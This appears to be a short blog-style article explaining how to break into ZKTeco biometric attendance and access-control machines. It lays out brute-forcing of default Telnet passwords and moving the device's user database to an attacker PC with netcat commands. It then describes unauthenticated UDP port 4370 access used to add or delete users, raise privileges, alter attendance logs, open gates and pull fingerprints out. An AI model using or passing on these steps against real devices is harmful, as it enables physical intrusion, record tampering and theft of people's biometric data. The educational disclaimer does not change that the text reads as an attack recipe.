ZKTeco is a vendor who provides machines for the Biometrics of fingerprint, facial recognition and iris recognition. This vendor is quite famous especially in middle-east countries and is commonly found in most of the organizations.
This article demonstrates easy ways to break into some of ZKTeco machines. Please note that this article is only for educational purposes and the author bears no responsibility if this is used to perform any sort of illegal and/or unethical activity.
(i) Exploiting via Telnet Access :
Penetration testing is done on two models of ZKTeco which are uFace800/ID and iClock880-H/ID. Linux Kernel embedded in these systems are ZM220, ZEM600 and ZEM800. It is believed that this same method will work on other models as well.
Telnet door is enabled on these machines and default passwords have not been changed through which we gained access into the systems after performing brute-forcing through probable wordlists.
You can find the list of default passwords easily on the Internet
First we will search the database files by the command :
find -name *.db
It will search all the files in the system having extension “db” which denotes a database file.
Then we will move to that directory and using a tool “netcat”, we will transfer the file to our PC.
The command from sending side (ZEM220) is :
nc <ip-address> 9999 < ZKDB.db
where, <ip-address> is the IP of the PC where file is needed to be received but port 9999 has to be opened in the PC first which receives the transferred file using the following command on the PC :
nc -l -p 9999 > ZKDB
where, “-l” denotes that the port 9999 is opened to listen from the remote connection.
Please note that you can use any port and 9999 is not compulsory to be used.
After the file is transferred, “sqlite” or any other software can be used to view the database
(ii)Gaining Access through Improper Authentication:
UDP Port 4370 of ZK5000-ZK9000 allows anyone to connect to the system without any proper authentication. We can create custom commands and send it to the device through UDP port 4370 and download information. This can be confirmed by using the tool called “Scapy” from Linux OS. Alternatively, proprietary software of this company is also available which uses this port to connect to the device without password. This has been confirmed through the software “ZKTeco 5.0”, although other versions of this software can be used to exploit this vulnerability and were confirmed by the author.
Please note that, this method is also fruitful to open the gates which require biometric identification first.
This shows that one device has been connected and this is done without providing any password
Two methods described in the paper allows us to :
· Add a user
· Delete a user
· Increase or decrease the privileges of the user
· Modifying the log sheet to make someone absent or present on the given day
· Changing the time of the attendance
· Delete all the records
This database can be un-encrypted to extract the fingerprints of the users who are registered in the device and this extracted fingerprint can be maliciously used against the user in various ways.
Authour: Shameel Uddin (https://web.facebook.com/shameelisuddin)